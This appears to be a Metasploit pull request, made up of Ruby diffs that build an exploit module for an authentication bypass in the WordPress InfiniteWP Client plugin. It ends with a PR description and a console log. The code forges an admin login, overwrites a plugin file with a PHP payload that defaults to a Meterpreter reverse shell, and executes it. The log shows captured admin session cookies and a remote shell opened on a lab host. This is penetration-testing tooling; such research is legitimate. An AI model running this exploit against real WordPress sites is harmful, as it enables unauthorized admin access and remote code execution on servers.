--- a/lib/msf/core/exploit/http/wordpress/helpers.rb
+++ b/lib/msf/core/exploit/http/wordpress/helpers.rb
@@ -169,4 +169,26 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
     )
   end
 
+  # Helper method to retrieve plugin file contents.
+  #
+  # @param cookie [String] A valid admin session cookie
+  # @param file [String] The plugin file to retrieve (relative to plugins dir)
+  # @return [String,nil] The contents, nil on error
+  def wordpress_helper_get_plugin_file_contents(cookie, file)
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => normalize_uri(wordpress_url_backend, 'plugin-editor.php'),
+      'cookie'   => cookie,
+      'vars_get' => {'file' => file}
+    )
+
+    return unless res && res.code == 200
+
+    contents = res.get_html_document.at('//textarea[@name = "newcontent"]')
+
+    return unless contents
+
+    contents.text
+  end
+
 end

--- a/lib/msf/core/exploit/http/wordpress/helpers.rb
+++ b/lib/msf/core/exploit/http/wordpress/helpers.rb
@@ -139,13 +139,13 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
   #
   # @param cookie [String] A valid admin session cookie
   # @return [String,nil] The nonce, nil on error
-  def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil)
+  def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil, vars_get = nil)
     uri = path || normalize_uri(wordpress_url_backend, 'plugin-install.php')
     options = {
       'method'    => 'GET',
       'uri'       => uri,
       'cookie'    => cookie,
-      'vars_get'  => { 'tab' => 'upload' }
+      'vars_get'  => vars_get || { 'tab' => 'upload' }
     }
     res = send_request_cgi(options)
     if res && res.code == 200
@@ -155,4 +155,18 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
       return wordpress_helper_get_plugin_upload_nonce(cookie, path)
     end
   end
+
+  # Helper method to retrieve a valid plugin edit nonce.
+  #
+  # @param cookie [String] A valid admin session cookie
+  # @param file [String] The plugin file to edit (relative to plugins dir)
+  # @return [String,nil] The nonce, nil on error
+  def wordpress_helper_get_plugin_edit_nonce(cookie, file)
+    wordpress_helper_get_plugin_upload_nonce(
+      cookie,
+      normalize_uri(wordpress_url_backend, 'plugin-editor.php'),
+      'file' => file
+    )
+  end
+
 end

--- a/lib/msf/core/exploit/http/wordpress/uris.rb
+++ b/lib/msf/core/exploit/http/wordpress/uris.rb
@@ -94,6 +94,13 @@ module Msf::Exploit::Remote::HTTP::Wordpress::URIs
     normalize_uri(wordpress_url_backend, 'update.php')
   end
 
+  # Returns the Wordpress Admin Plugin Editor URL
+  #
+  # @return [String] Wordpress Admin Plugin Editor URL
+  def wordpress_url_admin_plugin_editor
+    normalize_uri(wordpress_url_backend, 'plugin-editor.php')
+  end
+
   # Returns the Wordpress wp-content dir URL
   #
   # @return [String] Wordpress wp-content dir URL

--- a/lib/msf/core/exploit/http/wordpress/version.rb
+++ b/lib/msf/core/exploit/http/wordpress/version.rb
@@ -183,7 +183,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version
       return Msf::Exploit::CheckCode::Detected("Could not identify the version number")
     end
 
-    vprint_status("Found version #{version} of the #{item_type}")
+    vprint_status("Found version #{version} in the #{item_type}")
 
     if fixed_version.nil?
       if vuln_introduced_version.nil?

--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -4,6 +4,7 @@
 #
 
 # Behavior
+require 'msf/core/exploit/auto_check'
 require 'msf/core/exploit/check_module'
 require 'msf/core/exploit/brute'
 require 'msf/core/exploit/brutetargets'

--- a/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
+++ b/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
@@ -25,7 +25,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
         Note that a valid administrator username is required for this module.
 
-        WARNING: WordPress 5.x is currently not supported. Tested against 4.x.
+        WordPress >= 4.9 is currently not supported due to a breaking WordPress
+        API change. Tested against 4.8.3.
       },
       'Author'         => [
         'WebARX', # Discovery
@@ -81,6 +82,8 @@ class MetasploitModule < Msf::Exploit::Remote
     if Gem::Version.new(version) >= Gem::Version.new('4.9')
       return CheckCode::Safe("WordPress #{version} is an unsupported target")
     end
+
+    vprint_good("WordPress #{version} is a supported target")
 
     check_version_from_custom_file(
       normalize_uri(wordpress_url_plugins, '/iwp-client/readme.txt'),

--- a/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
+++ b/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
@@ -5,7 +5,7 @@
 
 class MetasploitModule < Msf::Exploit::Remote
 
-  Rank = ExcellentRanking
+  Rank = ManualRanking
 
   include Msf::Exploit::Remote::HTTP::Wordpress
 
@@ -15,7 +15,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'Description'    => %q{
         This module exploits an authentication bypass in the WordPress
         InfiniteWP Client plugin to log in as an administrator and execute
-        arbitrary PHP code. A valid administrator username is required.
+        arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.
+
+        The module will attempt to retrieve the original PLUGIN_FILE contents
+        and restore them after payload execution. If VerifyContents is set,
+        which is the default setting, the module will check to see if the
+        restored contents match the original.
+
+        Note that a valid administrator username is required for this module.
       },
       'Author'         => [
         'WebARX', # Discovery
@@ -43,7 +50,8 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
 
     register_advanced_options([
-      OptBool.new('ForceExploit', [false, 'Override check result', false])
+      OptBool.new('ForceExploit',   [false, 'Override check result', false]),
+      OptBool.new('VerifyContents', [false, 'Verify file contents', true])
     ])
   end
 
@@ -104,18 +112,45 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("Successfully obtained cookie for #{username}")
     vprint_status("Cookie: #{cookie}")
 
-    print_status("Editing payload into #{plugin_uri}")
-    unless wordpress_edit_plugin(plugin_file, payload.encoded, cookie)
-      fail_with(Failure::UnexpectedReply, "Could not edit #{plugin_uri}")
+    print_status("Retrieving original contents of #{plugin_uri}")
+    og_contents = wordpress_helper_get_plugin_file_contents(cookie, plugin_file)
+
+    unless og_contents
+      fail_with(Failure::UnexpectedReply, "Could not retrieve #{plugin_uri}")
     end
 
-    print_good("Successfully edited payload into #{plugin_uri}")
+    print_good("Successfully retrieved original contents of #{plugin_uri}")
+    vprint_status('Contents:')
+    print(og_contents)
+
+    print_status("Overwriting #{plugin_uri} with payload")
+    unless wordpress_edit_plugin(plugin_file, payload.encoded, cookie)
+      fail_with(Failure::UnexpectedReply, "Could not overwrite #{plugin_uri}")
+    end
+
+    print_good("Successfully overwrote #{plugin_uri} with payload")
 
     print_status("Requesting payload at #{plugin_uri}")
     send_request_cgi({
       'method' => 'GET',
       'uri'    => plugin_uri
     }, 0)
+  ensure
+    print_status("Restoring original contents of #{plugin_uri}")
+    unless wordpress_edit_plugin(plugin_file, og_contents, cookie)
+      fail_with(Failure::UnexpectedReply, "Could not restore #{plugin_uri}")
+    end
+
+    return unless datastore['VerifyContents']
+
+    contents = wordpress_helper_get_plugin_file_contents(cookie, plugin_file)
+
+    unless contents == og_contents
+      fail_with(Failure::UnexpectedReply,
+                "Current contents of #{plugin_uri} DO NOT match original!")
+    end
+
+    print_good("Current contents of #{plugin_uri} match original!")
   end
 
 end

--- a/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
+++ b/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
@@ -23,6 +23,8 @@ class MetasploitModule < Msf::Exploit::Remote
         restored contents match the original.
 
         Note that a valid administrator username is required for this module.
+
+        WARNING: WordPress 5.x is currently not supported. Tested against 4.x.
       },
       'Author'         => [
         'WebARX', # Discovery
@@ -69,7 +71,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     unless wordpress_and_online?
-      return CheckCode::Safe('Is the site online and running WordPress?')
+      return CheckCode::Unknown('Is the site online and running WordPress?')
+    end
+
+    unless (version = wordpress_version)
+      return CheckCode::Unknown('Could not detect WordPress version')
+    end
+
+    if Gem::Version.new(version) >= Gem::Version.new('5.0')
+      return CheckCode::Safe("WordPress #{version} is an unsupported target")
     end
 
     check_version_from_custom_file(
@@ -104,8 +114,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     unless datastore['ForceExploit']
-      if check == CheckCode::Safe
-        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+      if [CheckCode::Unknown, CheckCode::Safe].include?(check)
+        fail_with(Failure::Unknown, 'Set ForceExploit to override')
       end
     end
 

--- a/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
+++ b/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ManualRanking
 
   include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(update_info(info,
@@ -52,7 +53,6 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
 
     register_advanced_options([
-      OptBool.new('ForceExploit',   [false, 'Override check result', false]),
       OptBool.new('VerifyContents', [false, 'Verify file contents', true])
     ])
   end
@@ -113,11 +113,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    unless datastore['ForceExploit']
-      if [CheckCode::Unknown, CheckCode::Safe].include?(check)
-        fail_with(Failure::Unknown, 'Set ForceExploit to override')
-      end
-    end
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
 
     print_status("Bypassing auth for #{username} at #{full_uri}")
     unless (@cookie = auth_bypass).include?('wordpress_logged_in')

--- a/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
+++ b/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Could not detect WordPress version')
     end
 
-    if Gem::Version.new(version) >= Gem::Version.new('5.0')
+    if Gem::Version.new(version) >= Gem::Version.new('4.9')
       return CheckCode::Safe("WordPress #{version} is an unsupported target")
     end
 

--- a/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
+++ b/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
@@ -1,0 +1,121 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WordPress InfiniteWP Client Authentication Bypass',
+      'Description'    => %q{
+        This module exploits an authentication bypass in the WordPress
+        InfiniteWP Client plugin to log in as an administrator and execute
+        arbitrary PHP code. A valid administrator username is required.
+      },
+      'Author'         => [
+        'WebARX', # Discovery
+        'wvu'     # Module
+      ],
+      'References'     => [
+        ['WPVDB', '10011'],
+        ['URL', 'https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/'],
+        ['URL', 'https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/'],
+        ['URL', 'https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html']
+      ],
+      'DisclosureDate' => '2020-01-14',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Privileged'     => false,
+      'Targets'        => [['InfiniteWP Client < 1.9.4.5', {}]],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/reverse_tcp'}
+    ))
+
+    register_options([
+      OptString.new('USERNAME',    [true, 'WordPress username', 'admin']),
+      OptString.new('PLUGIN_FILE', [true, 'Plugin file to edit', 'index.php'])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ])
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def plugin_file
+    datastore['PLUGIN_FILE']
+  end
+
+  def plugin_uri
+    normalize_uri(wordpress_url_plugins, plugin_file)
+  end
+
+  def check
+    unless wordpress_and_online?
+      return CheckCode::Safe('Is the site online and running WordPress?')
+    end
+
+    check_version_from_custom_file(
+      normalize_uri(wordpress_url_plugins, '/iwp-client/readme.txt'),
+      /^= ([\d.]+)/,
+      '1.9.4.5'
+    )
+  end
+
+  # https://plugins.trac.wordpress.org/browser/iwp-client/tags/1.9.4.4/init.php
+  def auth_bypass
+    json = {
+      'iwp_action' => %w[add_site readd_site].sample,
+      'params'     => {'username' => username}
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path),
+      'data'   => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}"
+    )
+
+    return unless res && res.code == 200 && (cookie = res.get_cookies)
+
+    cookie
+  end
+
+  def exploit
+    unless datastore['ForceExploit']
+      if check == CheckCode::Safe
+        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+      end
+    end
+
+    print_status("Bypassing auth for #{username} at #{full_uri}")
+    unless (cookie = auth_bypass)
+      fail_with(Failure::NoAccess, "Could not obtain cookie for #{username}")
+    end
+
+    print_good("Successfully obtained cookie for #{username}")
+    vprint_status("Cookie: #{cookie}")
+
+    print_status("Editing payload into #{plugin_uri}")
+    unless wordpress_edit_plugin(plugin_file, payload.encoded, cookie)
+      fail_with(Failure::UnexpectedReply, "Could not edit #{plugin_uri}")
+    end
+
+    print_good("Successfully edited payload into #{plugin_uri}")
+
+    print_status("Requesting payload at #{plugin_uri}")
+    send_request_cgi({
+      'method' => 'GET',
+      'uri'    => plugin_uri
+    }, 0)
+  end
+
+end

--- a/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
+++ b/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
@@ -88,11 +88,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       'method' => 'POST',
-      'uri'    => normalize_uri(target_uri.path),
+      'uri'    => wordpress_url_backend,
       'data'   => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}"
     )
 
-    return unless res && res.code == 200 && (cookie = res.get_cookies)
+    unless res && res.code == 200 && !(cookie = res.get_cookies).empty?
+      fail_with(Failure::NoAccess, "Could not obtain cookie for #{username}")
+    end
+
+    print_good("Successfully obtained cookie for #{username}")
+    vprint_status("Cookie: #{cookie}")
 
     cookie
   end
@@ -105,26 +110,28 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_status("Bypassing auth for #{username} at #{full_uri}")
-    unless (cookie = auth_bypass)
-      fail_with(Failure::NoAccess, "Could not obtain cookie for #{username}")
+    unless (@cookie = auth_bypass).include?('wordpress_logged_in')
+      fail_with(Failure::NoAccess, "Could not log in as #{username}")
     end
 
-    print_good("Successfully obtained cookie for #{username}")
-    vprint_status("Cookie: #{cookie}")
+    print_good("Successfully logged in as #{username}")
+    write_and_exec_payload
+  end
 
+  def write_and_exec_payload
     print_status("Retrieving original contents of #{plugin_uri}")
-    og_contents = wordpress_helper_get_plugin_file_contents(cookie, plugin_file)
+    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)
 
-    unless og_contents
+    unless contents
       fail_with(Failure::UnexpectedReply, "Could not retrieve #{plugin_uri}")
     end
 
     print_good("Successfully retrieved original contents of #{plugin_uri}")
     vprint_status('Contents:')
-    print(og_contents)
+    print(contents)
 
     print_status("Overwriting #{plugin_uri} with payload")
-    unless wordpress_edit_plugin(plugin_file, payload.encoded, cookie)
+    unless wordpress_edit_plugin(plugin_file, payload.encoded, @cookie)
       fail_with(Failure::UnexpectedReply, "Could not overwrite #{plugin_uri}")
     end
 
@@ -135,15 +142,19 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri'    => plugin_uri
     }, 0)
-  ensure
+
+    restore_contents(contents)
+  end
+
+  def restore_contents(og_contents)
     print_status("Restoring original contents of #{plugin_uri}")
-    unless wordpress_edit_plugin(plugin_file, og_contents, cookie)
+    unless wordpress_edit_plugin(plugin_file, og_contents, @cookie)
       fail_with(Failure::UnexpectedReply, "Could not restore #{plugin_uri}")
     end
 
     return unless datastore['VerifyContents']
 
-    contents = wordpress_helper_get_plugin_file_contents(cookie, plugin_file)
+    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)
 
     unless contents == og_contents
       fail_with(Failure::UnexpectedReply,


### PR DESCRIPTION
Easy afternoon module for a WordPress plugin with somewhere between 300,000 and 500,000 installs. You can read about the bug [here](https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/).

~**To-do:** don't overwrite the plugin file. I tried something and now have to stick with it. :X~ I opted to retrieve the contents of the file first, then overwrite the file, then restore the original contents. Prepending the payload to the existing file is too problematic.

This is currently what's overwritten: https://github.com/WordPress/WordPress/blob/master/wp-content/plugins/index.php. It's more or less empty. `hello.php` is another option, unless you really like [Hello, Dolly!](https://www.youtube.com/watch?v=l7N2wssse14)

```
msf5 > use exploit/unix/webapp/wp_infinitewp_auth_bypass
msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > show missing

Module options (exploit/unix/webapp/wp_infinitewp_auth_bypass):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)

msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rport 8000
rport => 8000
msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] WordPress 4.8.3 is a supported target
[*] Found version 1.9.4.4 in the custom file
[+] The target appears to be vulnerable.
[*] Bypassing auth for admin at http://127.0.0.1:8000/
[+] Successfully obtained cookie for admin
[*] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7Ca0f3f416f7c60a7e0ea1b17af88d4a5e38d96141451f94fe27f605806f03f0c2; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7Cfeffe683bdfaaa670102e6564130394440510bf97e1ad09713ef1c3aa5627bfc;
[+] Successfully logged in as admin
[*] Retrieving original contents of /wp-content/plugins/index.php
[+] Successfully retrieved original contents of /wp-content/plugins/index.php
[*] Contents:
<?php
// Silence is golden.
[*] Overwriting /wp-content/plugins/index.php with payload
[*] Acquired a plugin edit nonce: 74cde501ca
[*] Edited plugin file index.php
[+] Successfully overwrote /wp-content/plugins/index.php with payload
[*] Requesting payload at /wp-content/plugins/index.php
[*] Restoring original contents of /wp-content/plugins/index.php
[*] Sending stage (38288 bytes) to 192.168.56.1
[*] Acquired a plugin edit nonce: 74cde501ca
[*] Edited plugin file index.php
[+] Current contents of /wp-content/plugins/index.php match original!
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:51923) at 2020-02-07 12:11:28 -0600

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : c7f8fbe7b083
OS          : Linux c7f8fbe7b083 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64
Meterpreter : php/linux
meterpreter >
```

Closes #8740.